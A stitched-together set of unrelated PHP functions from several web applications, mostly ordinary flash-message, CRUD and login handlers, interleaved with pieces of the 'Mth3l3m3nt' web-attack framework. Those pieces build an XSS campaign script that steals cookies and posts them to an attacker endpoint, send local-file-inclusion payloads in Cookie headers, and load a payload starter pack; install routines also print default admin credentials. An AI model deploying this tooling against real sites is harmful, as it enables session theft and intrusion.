/** * validate email address * @param string $val * @param string $context * @param bool $mx * @return bool */ function email($val, $context = null, $mx = true) { $valid = true; if (!$context) { $context = 'error.validation.email'; } if (!empty($val)) { if (!\Audit::instance()->email($val, false)) { $val = NULL; if (!$this->f3->exists($context . '.invalid', $errText)) { $errText = 'e-mail is not valid'; } $this->f3->error(400, $errText); $valid = false; } elseif ($mx && !\Audit::instance()->email($val, true)) { $val = NULL; if (!$this->f3->exists($context . '.host', $errText)) { $errText = 'unknown mail mx.host'; } $this->f3->error(400, $errText); $valid = false; } } if (!$valid) { \Flash::instance()->setKey($context, 'has-error'); } return $valid; }
function render() { // Clean all output given first while (ob_get_level()) { ob_end_clean(); } $f3 = \Base::instance(); $f3->set('headline', 'Error ' . $f3->get('ERROR.code')); $f3->set('text', $f3->get('ERROR.text')); $f3->set('ESCAPE', false); if ($f3->get('AJAX')) { die(json_encode(array('error' => $f3->get('ERROR.text')))); } if ($f3->get('ERROR.code') == 400) { \Flash::instance()->addMessage($f3->get('ERROR.text'), 'warning'); $f3->set('HALT', false); return; } elseif ($f3->get('ERROR.code') == 404) { $f3->set('headline', 'Page not found'); } elseif ($f3->get('ERROR.code') == 405) { $f3->set('headline', 'This action is not allowed'); } elseif ($f3->get('ERROR.code') == 500) { $f3->set('headline', 'Internal Server Error'); if ($f3->get('DEV')) { $f3->set('trace', $f3->highlight($f3->get('ERROR.trace'))); } @mail($f3->get('error_mail'), 'Mth3l3m3nt Framework Error', $f3->get('ERROR.text') . "\n\n" . $f3->get('ERROR.trace')); } $f3->set('LAYOUT', 'error.html'); $f3->set('HALT', true); echo \Template::instance()->render('themes/default/layout.html'); }
public function install($db_type) { $f3 = \Base::instance(); $db_type = strtoupper($db_type); if ($db = storage::instance()->get($db_type)) { $f3->set('DB', $db); } else { $f3->error(256, 'no valid DB specified'); } // setup the models \Model\Post::setup(); \Model\Tag::setup(); \Model\Comment::setup(); \Model\User::setup(); // create demo admin user $user = new \Model\User(); $user->load(array('username = ?', 'admin')); if ($user->dry()) { $user->username = '******'; $user->name = 'Administrator'; $user->password = '******'; $user->save(); \Flash::instance()->addMessage('Admin User created,' . ' username: admin, password: fabulog', 'success'); } \Flash::instance()->addMessage('Setup complete', 'success'); }
/** * @param \Base $f3 * Description This function will be used to create the necessary script needed to hook a page. */ function create_campaign(\Base $f3) { $web = \Web::instance(); $this->response->data['SUBPART'] = 'xssrc_campaign.html'; if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.targetUrl')) { $error = true; \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning'); } else { $target_url = $f3->get('POST.targetUrl'); $c_host = parse_url($target_url, PHP_URL_HOST); $template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt'; $campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js'; $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js'; $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr'; copy($template_src, $campaign_file); $unprepped_contents = file_get_contents($campaign_file); $unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents); $unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents); file_put_contents($campaign_file, $unprepped_contents); $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success'); $this->response->data['content'] = $instructions; } } }
public static function getInstance() { if (!self::$instance) { self::$instance = new Flash(); } return self::$instance; }
public static function instance() { if (Flash::$instance === NULL) { Flash::$instance = new Flash(); } return Flash::$instance; }
/** * Login Procedure * @param $f3 * @param $params */ public function login($f3, $params) { if ($f3->exists('POST.username') && $f3->exists('POST.password')) { sleep(3); // login should take a while to kick-ass brute force attacks $user = new \Model\User(); $user->load(array('username = ?', $f3->get('POST.username'))); if (!$user->dry()) { // check hash engine $hash_engine = $f3->get('password_hash_engine'); $valid = false; if ($hash_engine == 'bcrypt') { $valid = \Bcrypt::instance()->verify($f3->get('POST.password'), $user->password); } elseif ($hash_engine == 'md5') { $valid = md5($f3->get('POST.password') . $f3->get('password_md5_salt')) == $user->password; } if ($valid) { @$f3->clear('SESSION'); //recreate session id $f3->set('SESSION.user_id', $user->_id); if ($f3->get('CONFIG.ssl_backend')) { $f3->reroute('https://' . $f3->get('HOST') . $f3->get('BASE') . '/'); } else { $f3->reroute('/cnc'); } } } \Flash::instance()->addMessage('Wrong Username/Password', 'danger'); } $this->response->setTemplate('templates/login.html'); }
/** * Init Flash service * * @param void * @return null */ function init() { if (isset($this) && instance_of($this, 'Flash')) { $this->readFlash(); } else { $instance =& Flash::instance(); $instance->init(); } // if }
/** * @param \Base $f3 * @param array $params * @return bool */ public function getSingle(\Base $f3, $params) { $this->response->data['SUBPART'] = 'comment_edit.html'; if (isset($params['id'])) { $this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id'])); if (!$this->resource->dry()) { return true; } } \Flash::instance()->addMessage('Unknown Comment ID', 'danger'); $f3->reroute($f3->get('SESSION.LastPageURL')); }
public function delete() { $flash = Flash::instance(); $event = $this->_templateobject; $event->load($this->_data['id']); if ($event->delete()) { $flash->addMessage('Event deleted successfully'); sendTo('crmcalendars', 'index', $this->_modules); } else { $flash->addError('Failed to delete event'); sendBack(); } }
public function delete(\Base $f3, $params) { $this->resource->reset(); $msg = \Flash::instance(); if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); if ($f3->get('HOST') == 'ikkez.de' && !$this->resource->dry() && $this->resource->username == 'admin') { $msg->addMessage("You are not allowed to delete the demo-admin", 'danger'); $f3->reroute('/admin/' . $params['module']); return; } parent::delete($f3, $params); } $f3->reroute($f3->get('SESSION.LastPageURL')); }
/** * delete a record * @param \Base $f3 * @param array $params */ public function delete(\Base $f3, $params) { $this->resource->reset(); $flash = \Flash::instance(); if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); if ($this->resource->dry()) { $flash->addMessage('No record found with this ID.', 'danger'); } else { $this->resource->erase(); $flash->addMessage("Record deleted.", 'success'); } } $f3->reroute($f3->get('SESSION.LastPageURL')); }
public function generic_request(\Base $f3) { $web = \Web::instance(); $this->response->data['SUBPART'] = 'websaccre_generic_request.html'; $audit_instance = \Audit::instance(); if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.url')) { $error = true; \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning'); } else { $audited_url = $audit_instance->url($f3->get('POST.url')); if ($audited_url == TRUE) { /** * Shared Hosting Servers Have an issue ..safemode and openbasedir setr and curl gives error enable the lines below and comment out the $request_successful one $options = array('follow_location'=>FALSE); $request_successful=$web->request($f3->get('POST.url'),$options); * */ //handle POST data $postReceive = $f3->get('Post.postReceive'); $postData = explode("&", $postReceive); $postData = array_map("trim", $postData); $address = $f3->get('POST.url'); if ($f3->get('POST.means') == "POST") { $options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData)); } else { $options = array('method' => $f3->get('POST.means')); } $request_successful = $web->request($address, $options); if (!$request_successful) { \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning'); } else { $result_body = $request_successful['body']; $result_headers = $request_successful['headers']; $engine = $request_successful['engine']; $headers_max = implode("\n", $result_headers); $myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine; $this->response->data['content'] = $myFinalRequest; } } else { \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger'); } } } }
/** * Handles Your little Hurl.it like service to make requests to remote servers using various methods * @package Controller */ public function generic_request(\Base $f3) { $web = \Web::instance(); $this->response->data['SUBPART'] = 'websaccre_generic_request.html'; $audit_instance = \Audit::instance(); if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.url')) { $error = true; \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning'); } else { $audited_url = $audit_instance->url($f3->get('POST.url')); if ($audited_url == TRUE) { //handle POST data $postReceive = $f3->get('POST.postReceive'); $createPostArray = parse_str($postReceive, $postData); if (ini_get('safe_mode')) { $follow_loc = FALSE; } else { $follow_loc = TRUE; } $address = $f3->get('POST.url'); if ($f3->get('POST.means') == "POST") { $options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData), 'follow_location' => $follow_loc); $request_successful = $web->request($address, $options); } elseif ($f3->get('POST.means') == "GET" or $f3->get('POST.means') == "TRACE" or $f3->get('POST.means') == "OPTIONS" or $f3->get('POST.means') == "HEAD") { $options = array('method' => $f3->get('POST.means'), 'follow_location' => $follow_loc); $request_successful = $web->request($address, $options); } else { \Flash::instance()->addMessage('Unsupported Header Method', 'danger'); } if (!$request_successful) { \Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning'); } else { $result_body = $request_successful['body']; $result_headers = $request_successful['headers']; $engine = $request_successful['engine']; $headers_max = implode("\n", $result_headers); $myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine; $this->response->data['content'] = $myFinalRequest; } } else { \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger'); } } } }
/** * Installs tables with default user * @param $db_type */ public function install($db_type) { $f3 = \Base::instance(); $db_type = strtoupper($db_type); if ($db = DBHandler::instance()->get($db_type)) { $f3->set('DB', $db); } else { $f3->error(256, 'no valid Database Type specified'); } // setup the models \Model\User::setup(); \Model\Payload::setup(); \Model\Webot::setup(); // create demo admin user $user = new \Model\User(); $user->load(array('username = ?', 'mth3l3m3nt')); if ($user->dry()) { $user->username = '******'; $user->name = 'Framework Administrator'; $user->password = '******'; $user->email = '*****@*****.**'; $user->save(); //migrate payloads successfully $payload_file = $f3->ROOT . $f3->BASE . '/db_dump_optional/mth3l3m3nt_payload'; if (file_exists($payload_file)) { $payload = new \Model\Payload(); $payload_file_data = $f3->read($payload_file); $payloadarray = json_decode($payload_file_data, true); foreach ($payloadarray as $payloaddata) { $payload->pName = $payloaddata['pName']; $payload->pType = $payloaddata['pType']; $payload->pCategory = $payloaddata['pCategory']; $payload->pDescription = $payloaddata['pDescription']; $payload->payload = $payloaddata['payload']; $payload->save(); //ensures values set to null before continuing update $payload->reset(); } //migtate payloads \Flash::instance()->addMessage('Payload StarterPack: ,' . 'All Starter Pack Payloads added New database', 'success'); } else { \Flash::instance()->addMessage('Payload StarterPack: ,' . 'StarterPack Database not Found no payloads installed ', 'danger'); } \Flash::instance()->addMessage('Admin User created,' . ' username: mth3l3m3nt, password: mth3l3m3nt', 'success'); } \Flash::instance()->addMessage('New Database Setup Completed', 'success'); }
public function database(\Base $f3) { $this->response->data['SUBPART'] = 'settings_database.html'; $cfg = \Config::instance(); if ($f3->get('VERB') == 'POST' && $f3->exists('POST.active_db')) { $type = $f3->get('POST.active_db'); $cfg->{'DB_' . $type} = $f3->get('POST.DB_' . $type); $cfg->ACTIVE_DB = $type; $cfg->save(); \Flash::instance()->addMessage('Config saved', 'success'); $setup = new \Setup(); $setup->install($type); // logout $f3->clear('SESSION.user_id'); } $cfg->copyto('POST'); $f3->set('JIG_format', array('JSON', 'Serialized')); }
function post_index($f3) { $user = \User::createUser(\kksd\Sesi::$DB); $user->load(array("email=?", $f3->POST['email'])); if ($user->checkLogin($f3->get('POST.email'), $f3->get('POST.password'))) { $user->load(array("email=?", $f3->POST['email'])); $f3->SESSION['user_type'] = 'admin'; if (!$f3->POST['remember']) { $f3->SESSION['user'] = $user->id; $f3->SESSION['user_obj'] = $user; } else { $f3->set('COOKIE.user', $user->id, time() + 24 * 3600 * 7); } $f3->reroute('@admin_home'); return; } \Flash::instance()->addMessage('Wrong password, you morron!', 'danger'); $this->index($f3); return; }
public function getwhois(\Base $f3) { $web = \Web::instance(); $this->response->data['SUBPART'] = 'websaccre_whois.html'; if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.hostname')) { $error = true; \Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning'); } else { $address = $f3->get('POST.hostname'); $mywhois = $web->whois($address); if (!$mywhois) { \Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning'); } else { $this->response->data['content'] = $mywhois; } } } }
public function delete() { $accessobject = AccessObject::Instance(); $editable = $accessobject->hasPermission('despatch', 'sodespatchevents', 'edit'); if ($editable) { $flash = Flash::instance(); $event = $this->_uses['SODespatchEvent']; $event->load($this->_data['id']); $this->_data['SODespatchEvent']['id'] = $this->_data['id']; $this->_data['SODespatchEvent']['status'] = 'X'; if (parent::save('SODespatchEvent')) { $flash->clearMessages(); $flash->addMessage("Event successfully deleted"); sendTo('sodespatchevents', 'index', array('despatch')); } else { $flash->addError("Failed to delete event"); sendBack(); } } else { $flash->addError("You don't have permission to delete an event"); sendBack(); } }
public function cookie_based_lfi($method, $blankurl, $url, $payload) { $web = \Web::instance(); $f3 = \Base::instance(); $options = array('method' => $method, 'header' => array('Accept: */*', 'User-Agent: Mth3l3m3ntFramework/4.0 (compatible; MSIE 6.0; HackingtoshTuxu 4.0; .NET CLR 1.1.4322)', 'Cookie: ' . $payload, 'Connection: Close', 'Pragma: no-cache', 'Cache-Control: no-cache')); $audit_instance = \Audit::instance(); if ($f3->get('VERB') == 'POST') { $error = false; if ($blankurl) { $error = true; \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning'); } else { $audited_url = $audit_instance->url($url); if ($audited_url == TRUE) { $request_successful = $web->request($url, $options); if (!$request_successful) { \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning'); } else { $result_body = $request_successful['body']; $result_headers = $request_successful['headers']; $response_header = $result_headers["0"]; $engine = $request_successful['engine']; $headers_max = implode("\n", $result_headers); if (strpos($response_header, '200 OK') !== false) { $myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine; $this->response->data['content'] = $myFinalRequest; } else { $this->response->data['content'] = "Not Exploitable Application Returned the response below: \n\n " . $headers_max; } //convert array header to string } } else { \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger'); } } } }
public function save() { $errors = array(); $person = $this->_templateobject; $personmodel = get_class($person); if (!$this->checkParams($personmodel)) { sendBack(); } $persondata = $this->_data[$personmodel]; $personidfield = $person->idField; if (isset($persondata[$person->idField])) { $personid = $persondata[$personidfield]; } else { $personid = ''; } if (!empty($personid)) { $person->load($personid); if (!$person->isLoaded()) { $flash = Flash::instance(); $flash->addError('You do not have permission to edit this person.'); sendTo($this->name, 'index', $this->_modules); return; } } $flash = Flash::Instance(); $db =& DB::Instance(); $db->StartTrans(); if (isset($this->_data['Address']) && !empty($this->_data['Address']['id'])) { // Selected pre-existing address unset($this->_data['Address']); } if (isset($this->_data['PartyAddress']) && isset($this->_data['Address'])) { $partyaddress = DataObjectFactory::Factory('PartyAddress'); $partyaddress->checkAddress($this->_data); } $partycontactmethod = DataObjectFactory::Factory('PartyContactMethod'); foreach ($partycontactmethod->getEnumOptions('type') as $key => $type) { if (isset($this->_data[$type]['PartyContactMethod']) && isset($this->_data[$type]['Contactmethod'])) { if (empty($this->_data[$type]['Contactmethod']['contact'])) { if (!empty($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField])) { $partycontactmethod->delete($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField], $errors); } unset($this->_data[$type]); } else { $partycontactmethod->check($this->_data[$type]); } } } if (count($errors) == 0 && parent::save($personmodel, $this->_data, $errors)) { foreach ($this->saved_models as $model) { if (isset($model[$personmodel])) { $person = $model[$personmodel]; break; } } // Now get the saved Person details $person_id = $person->{$personidfield}; $people_category = DataObjectFactory::Factory('PeopleInCategories'); $current_categories = $people_category->getCategoryID($person_id); $check_categories = array(); $delete_categories = array(); $insert_categories = array(); $new_categories = array(); if (isset($this->_data['ContactCategories'])) { $delete_categories = array_diff($current_categories, $this->_data['ContactCategories']['category_id']); $insert_categories = array_diff($this->_data['ContactCategories']['category_id'], $current_categories); $new_categories = array_diff($current_categories, $delete_categories); $new_categories += $insert_categories; } else { $delete_categories = $current_categories; } $ledger_category = DataObjectFactory::Factory('LedgerCategory'); $ledger_types = $ledger_category->checkPersonUsage($person_id); foreach ($ledger_types as $ledger_type => $categories) { if ($categories['exists'] && !array_intersect($categories['categories'], $new_categories)) { foreach (array_intersect($categories['categories'], $delete_categories) as $category_id) { $category = DataObjectFactory::Factory('ContactCategory'); $category->load($category_id); $errors[$category->name] = 'Cannot remove category ' . $category->name . ' - ' . $ledger_type . ' entry exists'; } } } $result = count($errors) == 0; if (!empty($delete_categories) && $result) { // All OK, so delete the associations $result = $people_category->delete(array_keys($delete_categories), $errors); } if (!empty($insert_categories) && $result) { // No errors and some new categories to assign to the person $result = $people_category->insert($insert_categories, $person_id); } if ($result) { // All OK $db->CompleteTrans(); sendTo($this->name, 'view', $this->_modules, array($personidfield => $person_id)); } } $flash = Flash::Instance(); $flash->addErrors($errors); $db->FailTrans(); $db->CompleteTrans(); $this->refresh(); }
/** * @param \Base $f3 * @param array $params */ public function delete(\Base $f3, $params) { $this->resource->reset(); $msg = \Flash::instance(); if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); parent::delete($f3, $params); } $f3->reroute($f3->get('SESSION.LastPageURL')); }
* resources etc * * @version 1.0 * @http://www.projectpier.org/ */ trace(__FILE__, 'begin'); define('FILE_STORAGE_FILE_SYSTEM', 'fs'); define('FILE_STORAGE_MYSQL', 'mysql'); define('TOKEN_COOKIE_NAME', 'pp088' . TABLE_PREFIX); //$installation_root = config_option('installation_root', dirname($_SERVER['PHP_SELF']) ); $path = $_SERVER['PHP_SELF']; $path = substr($path, 0, strpos($path, 'index.php')); $installation_root = $path; define('ROOT_URL', $installation_root); // Init flash! Flash::instance(); $language = config_option('installation_base_language', 'en_us'); if (isset($_GET['language'])) { $_SESSION['language'] = $_GET['language']; $_GET['language'] = ''; } if (isset($_SESSION['language'])) { $language = $_SESSION['language']; } if (!plugin_active('i18n')) { Localization::instance()->loadSettings($language, ROOT . '/language'); } try { trace(__FILE__, 'CompanyWebsite::init()'); CompanyWebsite::init(); if (config_option('upgrade_check_enabled', false)) {
} if (!is_writable('framework/data/')) { $writeableErr[] = sprintf('please make sure that the \'%s\' directory is writable.', 'framework/data/'); } if (!is_writable('framework/data/site_config.json')) { $writeableErr[] = sprintf('please make sure that the \'%s\' file is writable.', 'framework/data/site_config.json'); } //handles all pagination \Template::instance()->extend('pagebrowser', '\\Pagination::renderTag'); \Template\FooForms::init(); if (isset($writeableErr)) { header('Content-Type: text;'); die(implode("\n", $writeableErr)); } //Initialize some F3 Settings $f3->set('FLASH', Flash::instance()); $web = Web::instance(); //Database Setup From our Config Class Instance $cfg = Config::instance(); $f3->set('CONFIG', $cfg); if ($cfg->ACTIVE_DB) { $f3->set('DB', DBHandler::instance()->get($cfg->ACTIVE_DB)); } else { $f3->error(500, 'Sorry, but there is no active DB setup.'); } /////////////// // frontend // /////////////// $f3->route(array('GET /', 'GET /@page', 'GET /payloads', 'GET /page/@page'), 'Controller\\Payload->getList'); // view single $f3->route(array('GET /payload/@id'), 'Controller\\Payload->viewSingle');
/** * Returns and removes variable from flash. * * @param unknown_type $name * @return unknown */ function flash_pop($name) { $ret = Flash::instance()->getVariable($name); Flash::instance()->removeVariable($name); return $ret; }
/** * Conflict incoming mail * * @param void * @return void */ function conflict() { if ($this->active_mail->isNew()) { $this->httpError(HTTP_ERR_NOT_FOUND); } // if require_once INCOMING_MAIL_MODULE_PATH . '/models/IncomingMailImporter.class.php'; $mail_data = $this->request->post('mail'); if (!is_foreachable($mail_data)) { flash_error(incoming_mail_module_get_status_description($this->active_mail->getState())); $mail_data = array('subject' => $this->active_mail->getSubject(), 'body' => $this->active_mail->getBody(), 'created_by_id' => $this->active_mail->getCreatedById(), 'project_id' => $this->active_mail->getProjectId()); } // if if ($this->request->isSubmitted()) { $this->active_mail->setSubject(array_var($mail_data, 'subject')); $this->active_mail->setBody(array_var($mail_data, 'body')); $creator_id = array_var($mail_data, 'created_by_id'); if ($creator_id && $creator_id != 'original_author') { $creator = Users::findById($creator_id); if (instance_of($creator, 'User')) { $this->active_mail->setCreatedBy($creator); } // if } // if $this->active_mail->setCreatedById(array_var($mail_data, 'created_by_id')); $this->active_mail->setObjectType(array_var($mail_data, 'object_type')); if (array_var($mail_data, 'object_type') == 'comment') { $this->active_mail->setParentId(array_var($mail_data, 'parent_id')); } // if // import email if (instance_of($importing_result = IncomingMailImporter::importPendingEmail($this->active_mail, $creator_id == 'original_author'), 'ProjectObject')) { // we have successfully imported email $this->active_mail->delete(); if ($this->request->isAsyncCall()) { $this->renderText(lang('<p>Conflict Solved Successfully!</p><p>View created <a href=":url">:object</a>.</p>', array('object' => $this->active_mail->getObjectType(), 'url' => $importing_result->getViewUrl()))); } else { flash_success('Conflict Solved Successfully!'); $this->redirectTo('incoming_mail'); } // if } else { if ($this->request->isAsyncCall()) { $this->httpError(HTTP_ERR_INVALID_PROPERTIES, null, false, 2); } else { flash_error($importing_result->getMessage()); } // if } // if } // if $user = $this->active_mail->getCreatedBy(); if (instance_of($user, 'User')) { $this->smarty->assign('object_user', $user); } else { $this->smarty->assign('object_user', $this->logged_user); } // if $this->smarty->assign(array('async' => $this->request->isAsyncCall(), 'form_url' => $this->active_mail->getImportUrl() . ($this->request->isAsyncCall() ? '?skip_layout=1&async=1' : ''), 'status_message' => incoming_mail_module_get_status_description($this->active_mail->getState()), 'mail_data' => $mail_data, 'project' => $this->active_mail->getProject())); $flash =& Flash::instance(); $flash->init(); js_assign('additional_fields_url', assemble_url('incoming_mail_additional_form_fields')); }
/** * Handles Decoding Functions * @param \Base $f3 */ public function decoder_multi(\Base $f3) { $this->response->data['SUBPART'] = 'dencoder_decoder_multi.html'; $audit_instance = \Audit::instance(); if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.encoded')) { $error = true; \Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning'); } else { $encoded_text_string = $f3->get('POST.encoded'); $encodedFormat = $f3->get('POST.encodedFormat'); switch ($encodedFormat) { case "base64": $decoded = trim($encoded_text_string); if (base64_encode(base64_decode($decoded)) === $decoded) { $decoded = base64_decode($decoded, true); $this->response->data['content'] = $decoded; } else { \Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning'); } break; case "hex": $decoded = trim($encoded_text_string); if (is_numeric('0x' . $decoded)) { if (function_exists('hex2bin')) { $decoded = hex2bin($decoded); $this->response->data['content'] = $decoded; } else { \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning'); } } else { \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning'); } break; case "hex_0x": $clear_prefix = str_replace("0x", "", $encoded_text_string); $clear_prefix = trim($clear_prefix); if (is_numeric('0x' . $clear_prefix)) { if (function_exists('hex2bin')) { $decoded = hex2bin($clear_prefix); $this->response->data['content'] = $decoded; } else { \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning'); } } else { \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning'); } break; case "hex_slash_x": $clear_prefix = str_replace("\\x", "", $encoded_text_string); $clear_prefix = trim($clear_prefix); if (is_numeric('0x' . $clear_prefix)) { if (function_exists('hex2bin')) { $decoded = hex2bin($clear_prefix); $this->response->data['content'] = $decoded; } else { \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning'); } } else { \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning'); } break; case "rot13": $decoded = str_rot13(trim($encoded_text_string)); $this->response->data['content'] = $decoded; break; default: \Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning'); } } } }
/** * Delete Cookies & Files with content from hooking page * @param \Base $f3 * @param array $params */ public function delete(\Base $f3, $params) { $this->resource->reset(); $msg = \Flash::instance(); if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); $url1 = $this->resource->vulnerablePageContent; $url2 = $this->resource->indirect_target_page; $url3 = $this->resource->vulnerableUrl; $vulnPage = $f3->ROOT . parse_url($url1, PHP_URL_PATH); $targetPage = $f3->ROOT . parse_url($url2, PHP_URL_PATH); $attack_script = $f3->ROOT . $f3->BASE . '/scripts/' . parse_url($url3, PHP_URL_HOST) . '.js'; if (file_exists($vulnPage) || file_exists($targetPage) || file_exists($attack_script)) { unlink($vulnPage); unlink($targetPage); unlink($attack_script); } parent::delete($f3, $params); } $f3->reroute($f3->get('SESSION.LastPageURL')); }
public function hide($f3, $params) { if ($this->resource->updateProperty(array('_id = ?', $params['id']), 'published', false)) { \Flash::instance()->addMessage('Your post is now hidden.', 'success'); } else { \Flash::instance()->addMessage('This Post ID was not found', 'danger'); } $f3->reroute('/admin/post'); }
public function update_prices() { $flash = Flash::instance(); $errors = array(); $warnings = array(); $db = DB::Instance(); $start_date = $_SESSION['price_uplift_params']['price_uplift_start_date']; $end_date = $_SESSION['price_uplift_params']['price_uplift_end_date']; $selected = empty($_SESSION['price_uplift'][$this->_data['page']]) ? array() : $_SESSION['price_uplift'][$this->_data['page']]; $count = 0; foreach ($selected as $id => $detail) { $db->StartTrans(); if ($detail['select'] == 'true') { $productline = DataObjectFactory::Factory('SOProductLine'); $productline->load($id); if (!$productline->isLoaded()) { $errors[$id] = 'Failed to find product details ' . $id; } elseif ($productline->price == $detail['new_price']) { $warnings[$id] = 'Entry not updated because price has not changed ref:' . $id; } else { $productline->end_date = $end_date; if (!$productline->save()) { $errors[$id] = 'Failed to close off old price ref:' . $id . ' - ' . $db->ErrorMsg(); } else { $test = $productline->autoHandle($productline->idField); if ($test !== false) { $productline->id = $test; $productline->price = $detail['new_price']; $productline->start_date = $start_date; $productline->end_date = null; $productline->created = fix_date(date(DATE_FORMAT)); $productline->createdby = EGS_USERNAME; if (!$productline->save()) { $errors[$id] = 'Failed to save new price ref:' . $id . ' - ' . $db->ErrorMsg(); } else { $count++; } } else { $errors[] = 'Error getting identifier for new price'; } } } unset($productline); } $db->CompleteTrans(); $_SESSION['price_uplift_params']['price_uplift_progress_count']++; } if (count($errors) > 0) { $flash->addErrors($errors); } if (count($warnings) > 0) { $flash->addWarnings($warnings); } $flash->save(); $_SESSION['price_uplift_params']['price_uplift_updated_count'] += $count; echo json_encode(array('updated_count' => $count, 'warnings' => $warnings, 'errors' => $errors)); exit; }